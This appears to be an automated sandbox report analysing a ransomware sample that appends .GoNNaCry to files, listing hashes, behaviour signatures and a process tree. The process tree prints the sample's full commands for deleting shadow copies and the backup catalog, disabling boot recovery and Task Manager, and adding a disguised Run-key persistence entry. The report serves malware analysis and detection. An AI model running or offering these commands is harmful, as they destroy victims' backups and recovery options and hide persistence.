Analysis
-
max time kernel
13s -
max time network
110s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
07/05/2021, 04:05
Static task
static1
Behavioral task
behavioral1
Sample
Compile by raminhk 2.exe
Resource
win7v20210410
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Compile by raminhk 2.exe
Resource
win10v20210408
windows10_x64
0 signatures
0 seconds
General
-
Target
Compile by raminhk 2.exe
-
Size
7.9MB
-
MD5
fb9eb8850ee963bc69583f0227803aef
-
SHA1
a8c4277662b79d84ebec5f17b83153d364a478a7
-
SHA256
373dd8d9b31679fa1f46779be91f0d8e378af030bffe91de45d150c78e2cae53
-
SHA512
2d26b6f014ac2ca6b925ab5dfe259847869d3967754de91c8434f0a932bd2ec844403dfa2bc5b5c3442730c42500e2f0c45d321b416450012aae62128e74942c
Score
9/10
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
pid Process 2704 bcdedit.exe -
Disables Task Manager via registry modification
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\DenyReset.tif => C:\Users\Admin\Pictures\DenyReset.tif.GoNNaCry Compile by raminhk 2.exe File renamed C:\Users\Admin\Pictures\MountDismount.tif => C:\Users\Admin\Pictures\MountDismount.tif.GoNNaCry Compile by raminhk 2.exe -
resource yara_rule behavioral2/memory/424-114-0x00000000002E0000-0x0000000001570000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Infected = "a15ea89b6e566d87d387e161e6697ce2854fea89c9143c6acdb31cca4f79844ea15ea89b6e566d87d387e161e6697ce2" Compile by raminhk 2.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security Update = "C:\\Users\\Admin\\WindowsSecurityUpdate.exe /onboot" reg.exe -
Drops desktop.ini file(s) 24 IoCs
description ioc Process File created C:\Users\Admin\Saved Games\desktop.ini Compile by raminhk 2.exe File created C:\Users\Admin\Videos\desktop.ini Compile by raminhk 2.exe File created C:\Users\Public\Pictures\desktop.ini Compile by raminhk 2.exe File created C:\Users\Public\desktop.ini Compile by raminhk 2.exe File created C:\Users\Admin\Favorites\desktop.ini Compile by raminhk 2.exe File created C:\Users\Admin\Links\desktop.ini Compile by raminhk 2.exe File created C:\Users\Admin\Pictures\desktop.ini Compile by raminhk 2.exe File created C:\Users\Public\AccountPictures\desktop.ini Compile by raminhk 2.exe File created C:\Users\Public\Downloads\desktop.ini Compile by raminhk 2.exe File created C:\Users\Public\Videos\desktop.ini Compile by raminhk 2.exe File created C:\Users\Admin\Documents\desktop.ini Compile by raminhk 2.exe File created C:\Users\Admin\Favorites\Links\desktop.ini Compile by raminhk 2.exe File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini Compile by raminhk 2.exe File created C:\Users\Admin\Desktop\desktop.ini Compile by raminhk 2.exe File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini Compile by raminhk 2.exe File created C:\Users\Public\Music\desktop.ini Compile by raminhk 2.exe File created C:\Users\Admin\OneDrive\desktop.ini Compile by raminhk 2.exe File created C:\Users\Admin\Searches\desktop.ini Compile by raminhk 2.exe File created C:\Users\Public\Desktop\desktop.ini Compile by raminhk 2.exe File created C:\Users\Public\Documents\desktop.ini Compile by raminhk 2.exe File created C:\Users\Public\Libraries\desktop.ini Compile by raminhk 2.exe File created C:\Users\Admin\Contacts\desktop.ini Compile by raminhk 2.exe File created C:\Users\Admin\Downloads\desktop.ini Compile by raminhk 2.exe File created C:\Users\Admin\Music\desktop.ini Compile by raminhk 2.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 2608 tasklist.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 2340 reg.exe 1652 reg.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 424 Compile by raminhk 2.exe 424 Compile by raminhk 2.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeDebugPrivilege 2608 tasklist.exe Token: SeIncreaseQuotaPrivilege 1548 WMIC.exe Token: SeSecurityPrivilege 1548 WMIC.exe Token: SeTakeOwnershipPrivilege 1548 WMIC.exe Token: SeLoadDriverPrivilege 1548 WMIC.exe Token: SeSystemProfilePrivilege 1548 WMIC.exe Token: SeSystemtimePrivilege 1548 WMIC.exe Token: SeProfSingleProcessPrivilege 1548 WMIC.exe Token: SeIncBasePriorityPrivilege 1548 WMIC.exe Token: SeCreatePagefilePrivilege 1548 WMIC.exe Token: SeBackupPrivilege 1548 WMIC.exe Token: SeRestorePrivilege 1548 WMIC.exe Token: SeShutdownPrivilege 1548 WMIC.exe Token: SeDebugPrivilege 1548 WMIC.exe Token: SeSystemEnvironmentPrivilege 1548 WMIC.exe Token: SeRemoteShutdownPrivilege 1548 WMIC.exe Token: SeUndockPrivilege 1548 WMIC.exe Token: SeManageVolumePrivilege 1548 WMIC.exe Token: 33 1548 WMIC.exe Token: 34 1548 WMIC.exe Token: 35 1548 WMIC.exe Token: 36 1548 WMIC.exe Token: SeIncreaseQuotaPrivilege 1548 WMIC.exe Token: SeSecurityPrivilege 1548 WMIC.exe Token: SeTakeOwnershipPrivilege 1548 WMIC.exe Token: SeLoadDriverPrivilege 1548 WMIC.exe Token: SeSystemProfilePrivilege 1548 WMIC.exe Token: SeSystemtimePrivilege 1548 WMIC.exe Token: SeProfSingleProcessPrivilege 1548 WMIC.exe Token: SeIncBasePriorityPrivilege 1548 WMIC.exe Token: SeCreatePagefilePrivilege 1548 WMIC.exe Token: SeBackupPrivilege 1548 WMIC.exe Token: SeRestorePrivilege 1548 WMIC.exe Token: SeShutdownPrivilege 1548 WMIC.exe Token: SeDebugPrivilege 1548 WMIC.exe Token: SeSystemEnvironmentPrivilege 1548 WMIC.exe Token: SeRemoteShutdownPrivilege 1548 WMIC.exe Token: SeUndockPrivilege 1548 WMIC.exe Token: SeManageVolumePrivilege 1548 WMIC.exe Token: 33 1548 WMIC.exe Token: 34 1548 WMIC.exe Token: 35 1548 WMIC.exe Token: 36 1548 WMIC.exe Token: SeBackupPrivilege 3908 vssvc.exe Token: SeRestorePrivilege 3908 vssvc.exe Token: SeAuditPrivilege 3908 vssvc.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 424 wrote to memory of 2608 424 Compile by raminhk 2.exe 75 PID 424 wrote to memory of 2608 424 Compile by raminhk 2.exe 75 PID 424 wrote to memory of 2700 424 Compile by raminhk 2.exe 79 PID 424 wrote to memory of 2700 424 Compile by raminhk 2.exe 79 PID 2700 wrote to memory of 508 2700 cmd.exe 81 PID 2700 wrote to memory of 508 2700 cmd.exe 81 PID 2700 wrote to memory of 1548 2700 cmd.exe 82 PID 2700 wrote to memory of 1548 2700 cmd.exe 82 PID 424 wrote to memory of 2008 424 Compile by raminhk 2.exe 85 PID 424 wrote to memory of 2008 424 Compile by raminhk 2.exe 85 PID 2008 wrote to memory of 2704 2008 cmd.exe 87 PID 2008 wrote to memory of 2704 2008 cmd.exe 87 PID 424 wrote to memory of 3556 424 Compile by raminhk 2.exe 88 PID 424 wrote to memory of 3556 424 Compile by raminhk 2.exe 88 PID 3556 wrote to memory of 2340 3556 cmd.exe 90 PID 3556 wrote to memory of 2340 3556 cmd.exe 90 PID 424 wrote to memory of 3652 424 Compile by raminhk 2.exe 91 PID 424 wrote to memory of 3652 424 Compile by raminhk 2.exe 91 PID 3652 wrote to memory of 1652 3652 cmd.exe 93 PID 3652 wrote to memory of 1652 3652 cmd.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\Compile by raminhk 2.exe"C:\Users\Admin\AppData\Local\Temp\Compile by raminhk 2.exe"1⤵
- Modifies extensions of user files
- Adds Run key to start application
- Drops desktop.ini file(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:424 -
C:\Windows\system32\tasklist.exetasklist /FO csv2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2608
-
-
C:\Windows\system32\cmd.execmd /c vssadmin delete shadow /all /quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -q2⤵
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\system32\vssadmin.exevssadmin delete shadow /all /quiet3⤵PID:508
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
-
-
C:\Windows\system32\cmd.execmd /c bcdedit /set {default} recoveryenabled No cmd.exe /C bcdedit /set {default} bootstatuspolicy ignoreallfailures C:\Windows\System32\cmd.exe /C vssadmin.exe Delete Shadows /All Quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2704
-
-
-
C:\Windows\system32\cmd.execmd /c REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Windows\system32\reg.exeREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:2340
-
-
-
C:\Windows\system32\cmd.execmd /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Windows Security Update" /t REG_SZ /d "C:\Users\Admin\WindowsSecurityUpdate.exe /onboot" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3652 -
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Windows Security Update" /t REG_SZ /d "C:\Users\Admin\WindowsSecurityUpdate.exe /onboot" /f3⤵
- Adds Run key to start application
- Modifies registry key
PID:1652
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3908